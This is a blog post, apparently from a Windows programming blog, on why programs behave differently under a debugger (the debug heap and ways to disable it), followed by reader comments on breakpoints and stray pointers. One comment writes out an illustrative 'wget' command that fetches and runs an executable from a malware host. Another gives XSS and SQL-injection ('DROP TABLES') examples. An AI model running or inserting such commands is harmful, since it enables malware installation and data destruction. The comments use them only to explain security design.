Why does my program run really slow or even crash (or stop crashing, or crash differently) if running under a debugger?


More than once, a customer has noticed that running the exact same program under the debugger rather than standalone causes it to change behavior. And not just in the “oh, the timing of various operations changed to hit different race conditions” but in much more fundamental ways like “my program runs really slow” or “my program crashes in a totally different location” or (even more frustrating) “my bug goes away“.

What’s going on? I’m not even switching between the retail and debug versions of my program, so I’m not a victim of changing program semantics in the debug build.

When a program is running under the debugger, some parts of the system behave differently. One example is that the Close­Handle function raises an exception (I believe it’s STATUS_INVALID_HANDLE but don’t quote me) if you ask it to close a handle that isn’t open. But the one that catches most people is that when run under the debugger, an alternate heap is used. This alternate heap has a different memory layout, and it does extra work when allocating and freeing memory to help try to catch common heap errors, like filling newly-allocated memory with a known sentinel value.

But this change in behavior can make your debugging harder or impossible.

So much for people’s suggestions to switch to a stricter implementation of the Windows API when a debugger is attached.

On Windows XP and higher, you can disable the debug heap even when debugging. If you are using a dbgeng-based debugger like ntsd or WinDbg, you can pass the -hd command line switch. If you are using Visual Studio, you can set the _NO_DEBUG_HEAP environment variable to 1.

If you are debugging on a version of Windows prior to Windows XP, you can start the process without a debugger, then connect a debugger to the live process. The decision to use the debug heap is made at process startup, so connecting the debugger afterwards ensures that the retail heap is chosen.

Comments (27)
  1. Adrian says:

    I never knew the debug heap stuff was tied to using a debugger.  I assume it's impossible for the debugger to switch heaps when attaching to an already-running program.  I also assume you're talking about the heap as in HeapAllocate and not the debug C and C++ runtime libraries that wrap memory allocation for debugging purposes.

  2. anyfoo says:

    @Adrian, it really seems very impossible for the debugger to "switch heaps" when attaching to an already-running program. The debug heap may very well have a completely different layout, which you can't rearrange without knowing what is pointing into it (which is practically impossible in C/C++ to find out). Not to mention that it would be a huge effort with very little gain… The same can be said for magically "injecting" any debugging runtime libraries into running code.

  3. Mike says:

    It seems that folks who might complain about the change in behavior should remember that a debugger is just a tool to help the debugging process.  Just because it's called a "debugger" doesn't mean that it's the only thing you should be using.  If your program crashes in a different place in the debugger, then clearly, the crash location isn't really where you're going to find the problem.  A binary search of recent code changes should help.  A good source code control system can help tremendously here.  Same goes for heisenbugs.  Raymond, I think you've posted here before about, "Just because the OS tries to help you when you do something wrong, doesn't mean that it's going to be helpful in every case."

  4. Ivo says:

    I am sure the debugger doesn't change the heap as it attaches to a process. That's what I used before I discovered _NO_DEBUG_HEAP on Larry Osterman's WebLog.

    Nitpicker corner: Of course I mean "Visual Studio's debugger". There may be other debuggers that try to do something more nefarious.

  5. Joshua says:

    The heisenbug you can understand is not the true heisenbug.

    You think you've seen trouble with "Aliens ate my software." You've seen nothing until you've seen an unrequested DMA from the wireless card overwrite the kernel.

  6. j b says:

    People complaining about the program running slower under a debugger have no clue about how a debugger works. I am rather impressed by how fast programs run under the control of a debugger.

    An story to illustrate why a bug can vanish under a debugger (this was neither under Windows nor on a PC!):

    We early suspected a stray pointer or array size violation causing the code to crash. It crashed even under the debugger, as long as we were stepping call-by-call. This was a "stone age" program, from age when a 2000 line function was considered OK, and we traced the problem down to a call to such a function. But wehere in those 35 pages of code? When line-by-line stepping was turned on, the program did not crash.

    The explanation: A stray pointer had modified an instruction. What happens when you set l-b-l stepping is that the debugger inserts a sofware breakpoint in place of the first instruction on every line; the original instruction will be retrieved from the executable file when needed Every time a line is to be executed, BP transfers control to the debugger, which replaces the breakpoint with the original instruction, and reinserts original instruction from the exeucable file, decrements the program counter so that the original instruction will be executed, steps one single instruction, and re-inserts the BP before continuing withe rest of the instructions for that line.

    The stray pointer hit the first instruction on a line, overwriting it with some garbage 'instruction code', crashing the program some time later when that instruction was executed. With the debugger in l-b-l-stepping, the debugger had placed a BP there, so it was the BP being destoryed. Before executing the destroyed instruction, the debugger fetched the original instruction, overwriting the (garbled) BP with the pure, virgin instruction, which was executed, before a BP again was inserted and no trace was left of the damage.

    (There were some unfortunate circumstances, such as the location being destoyed before the debugger inserted its BP – if the BP had been in place from the very start, the debugger wouldn't have been activated at that point to reinisert the original instruction. Indeed: If our first command to the debugger was to go into l-b-l stepping for the entire program, it would crash; we verified that after having found the explanation. But the size of the program made it unrealistic to do that in ordinary debugging; you would set l-b-l stepping on selected functions when needed, not all the time and not for the entire program.)

  7. Gabe says:

    The first thing I thought of when I saw "run really slow if being debugged" was that the program has too many calls to OutputDebugString. The second thing was that it's throwing too many exceptions (which were being ignored). I was pleasantly surprised to see a third item I hadn't anticipated.

  8. Jeroen Mostert says:

    @jb: thank heavens for modern architectures with hardware breakpoints, so debuggers can do this sort of thing without modifying code. And memory protection, of course, so code can't modify itself in the first place — but that's another kettle of fish.

  9. Csaboka says:

    @Jeroen:

    Last time I checked, x86 still had support for 4 hardware breakpoints only. I don't think you can get far without using the good old INT3 instruction for your breakpoints.

  10. CPDaniel says:

    @jb:  Ah yes, the good old days.  I remember tracking down bugs like that in embedded code nearly 30 years ago.  Fun times.

  11. Killer{R} says:

    I use another trick if want to prevent heap or some other logic changes when debugging: find out a PEB's address using !peb command in windbg, then set its BeingDebugged field to zero using eb command ad go. There're still other ways to detect debugger (and other ways to fake them), but this usually helps.

  12. j b says:

    @Jeroen:

    I am currently developing SW for an embedded ARM M0, which is like Csaboka says: 4 HW breakpoints – simply because you cannot easily set SW breakpoints in Flash code memory (even less in one-time-programmable code memory). That doesn't get you very far. We do a lot of debugging on a simulator (running on a PC), where we can set an arbitrary number of SW BPs.

    Obviously, memory protection makes wonders to debugging. But with several interpreted languages, "code" is restricted to an interpreter of a data structure residing in data space, and those HW protection mechanisms rarely support multiple data segments with individual protection. Besides, for some languages inviting you to write self-modifying code at one level or the other, you just cannot protect the data space representing this code. (Yes, I know that most programmers frown upon self-modifying code …yet they miight maintain e.g. a list or maybe a tree of pending operations, never realizing that the list really is a 'program', although at a very high level, that is modified all the time!)

  13. Joe says:

    @jb: "Yes, I know that most programmers frown upon self-modifying code".

    Sadly not so. That's why SQL injections are such an insidious and ubiquitous security hole on the Internet.

    Mixing Data and Code was the worst decision from a security and stability design point of view by programmers ever, and even more tragically lots of developers don't see it.

  14. j b says:

    @Joe: "That's why SQL injections are such an insidious and ubiquitous security hole on the Internet."

    Common programmer: "But that's not CODE! I am not modifying code, I am just building an SQL command string dynamically!"

  15. Jeroen Mostert says:

    @Csaboka: obviously you can't use HW breakpoints for everything, but I'd imagine line-by-line stepping could be done by moving ahead a single HW breakpoint, which would at least eliminate this particular kind of pernicious bug. Disclaimer: I have no idea if debuggers actually do it this way.

    @jb: I for one don't frown upon self-modifying code as a principle, I've written plenty myself back in the day. Of course, that day was well before those of pipelining architectures, where self-modifying code is not so hot for performance anymore. As a general approach, though, treating data as code (and vice versa) leads to marvels of flexibility, but is best approached with the level of humility appropriate to our limited capacity for understanding it (well, mine, at least).

    [Moving a single breakpoint means that the debugger would have to know ahead of time which branches are taken. (Which is the instruction "after" an if statement?) It's easier just to set breakpoints everywhere. -Raymond]
  16. Killer{R} says:

    Separating data and code isnt absolute fix against buffer overrun&co. Corrupting data only is not more secure than corrupting code in any real-world-complex-app. For example attacker can find in memory string with command line of some child app that will be executed later and write there wget http://www.malware.com/paloader.exe & start payloader.exe or do something else. Of course this will add some obstacles for attackers ad increase generic "price of attack", but you will pay wih flexibility of platform for this, thus, increasing generic "price of app developing". The only question what price will be higher here.

  17. Joe says:

    @Killer{R} Overwriting data is bad. But overwriting code is worse. Overwriting data MIGHT be able to be malicious later. Overwriting code IS game over NOW.

  18. Joshua says:

    [Moving a single breakpoint means that the debugger would have to know ahead of time which branches are taken. (Which is the instruction "after" an if statement?) It's easier just to set breakpoints everywhere. -Raymond]

    Still only 2 breakpoints. However, your point stands for call indirect.

    [If the code is optimized, you may need more than 2. (And you'd need a third in case a child function calls back re-entrantly into the original function.) Even with no optimizations, a switch would require a lot of breakpoints. -Raymond]
  19. Miff says:

    Wait why is the debug heap a good idea? Wouldn't you want to catch uninitialized memory during debugging? Switching to a more lenient version of the API seems like an even worse option then a stricter version.

  20. caf says:

    @Csaboka, @Jeroen: The 8086 line has always had the TF (Trap Flag), which if set, causes the processor to execute a single instruction and then call int 0x01.  This is intended to be used for single-stepping.

  21. Csaboka says:

    @caf:

    Yes, but that's for single-stepping at the assembly level. If you want to step by lines of a high-level language program, calling back to the debugger for each machine instruction would be a waste of time, when the debugger can just replace the first instruction of each high-level line with an INT3 and be done with it.

  22. Killer{R} says:

    2Joe If attacker overwrites anything – he likely known what he does – and he does attack, and if attack was executed – game is over just after this fact, dont reassure yourself with illusions.

    And if overwriting code was due to just a random bug in application, not caused by attacker's action – its not a problem that you will crash soon. Its even an opportunity.

  23. JU says:

    @Csaboka

    We're doing embedded debuggers, and a single HW BP is sometimes all you've got. The trick is to analyze the instructions after the PC, set the BP on any change of flow instruction, single step it and repeat this sequence until you reach a source line beginning.

    There is some ping-pong going on sure, but it's usually in the 100 millisecond order and isn't perceived by the user.

    Debugging a PC application this way would be much faster still, as you don't need to go through the USB to your debugger and JTAG port to the CPU, but VS just takes the easy way out here. Just like in not-showing you locals stored in registers with optimization enabled.

  24. Neil says:

    I prefer WinDbg's interpretation of "next" over gdb's; as I recall, if you "next" at the end of a function, gdb steps to the next source line of the caller, while WinDbg steps to the same source line if possible (e.g. if there's a further function call to invoke). (Sadly Step Into Specific doesn't work with virtual functions.)

  25. Joe says:

    @Killer{R}.

    If an attacker gets to change your document title via foo.php?title=<script>example outputs <h1><script>example</h1> there is a potential for embarrassment, but it's not the end of the world.

    If an attacker gets to change your document's CODE via foo.php?title=<script>example outputs <h1><script>example</h1> there is a potential for serious harm.

    If an attacker gets to change your page title via submit.php?title='DROP TABLES– changes the page title to "'DROP TABLES–" you get potential embarrassment. If he gets to EXECUTE "drop tables" in your SQL database, he gets the ability to do real harm to you and your customers.

    Data != Code. Attackers nearly always have some control over the data in your application. If you provide an equivilency between code and data (e.g. HTML is a string – wait – now it's javascript, or SQL is a string – wait – now it's SQL code! Or reflection via eval or filesystems being used for uploads as well as serving scripts) then suddenly you need to be careful about turning attacker provided data into attacker provided code – since attacker provided code is game over.

    If there is never an equivilency between data and code, the worst you can have is logic bugs such as authentication bypasses or failure to apply encryption.

    Data != Code isn't a total win for security, but it would be 95% of the journey.

  26. Joe says:

    Ok. Looks like in the first example the blog engine helpfully changed AMP-GT/LTs into < >s, thus kind of obscuring the point I was trying to make.

  27. Worst case of a debugger interference is when a breakpoint gets set by the debugger not by a line number, but by an absolute offset from a symbol (function name). As the code gets modified and recompiled, the location is now in the middle of an instruction, and the instruction gets corrupted by a stray CC. Fun.

Comments are closed.